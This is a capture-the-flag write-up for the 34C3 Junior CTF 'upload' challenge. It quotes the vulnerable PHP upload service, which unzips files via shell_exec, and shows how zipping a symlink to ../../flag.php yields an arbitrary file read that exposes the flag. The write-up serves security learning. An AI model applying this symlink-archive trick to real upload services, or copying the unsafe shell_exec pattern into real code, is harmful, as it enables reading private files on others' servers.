34C3 Junior CTF - upload

December 28, 2017

Today we’re going to look into one of the challenges from 34C3 Junior CTF called upload.

This is an useful service to unzip some files.

We added a flag for your convenience.

Let’s take a look at source code.

$UPLOADS = '/var/www/uploads/';
if(!empty($_FILES['uploaded_file'])) {
   $paths = scandir($UPLOADS);
   $now = time();
   foreach($paths as $path) {
       if ($path == '.') {
       $mtime = filemtime($UPLOADS . $path);
       if ($now - $mtime > 120) {
           shell_exec('rm -rf ' . $UPLOADS . $path);
   $path = $UPLOADS . uniqid('upl') . '/';
   if(!mkdir($path, 0777, true)) {
       die('mkdir failed');
   $zip = $path . uniqid('zip');
   if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $zip)) {
       shell_exec('unzip -j -n ' . $zip . ' -d ' . $path);
       header('Location: uploads/'. basename($path) . '/');
   } else {
       echo 'There was an error uploading the file, please try again!';
} else {
<!DOCTYPE html>
   <title>Upload your files</title>
   if (@$_GET['source']) {
   } else {
   <form enctype="multipart/form-data" method="POST">
       <p>Upload your file</p>
       <input type="file" name="uploaded_file"></input><br />
       <input type="submit"></input>
   <a href="?source=1">Show source</a>

The most important part is that the shell_exec function will use unzip tool, unpacking the archive that we uploaded. We have to somehow get to the flag, which is located in the main directory - Firstly, we’ll have to get 2 directories higher so ../../ should be essential.

After a while I found out that we can simply compress symlinks, which will allow us to enter a file linked by the content of an archive. Let’s create this file.

ln -s ../../flag.php ./symlink.txt

Now we’re able to compress it and send to the web service.

<head><title>Index of /uploads/upl5a46a1bef0d1f/</title></head>
<body bgcolor="white">
<h1>Index of /uploads/upl5a46a1bef0d1f/</h1><hr><pre><a href="../">../</a>
<a href="symlink.txt">symlink.txt</a>                                        27-Dec-2017 19:57                  48

After viewing the content of symlink.txt, we are provided with the content of flag.

$flag = "34C3_unpack_th3_M1ss1ng_l!nk"


If you have any suggestions regarding this post or just want to chat together check out these ways to reach out to me.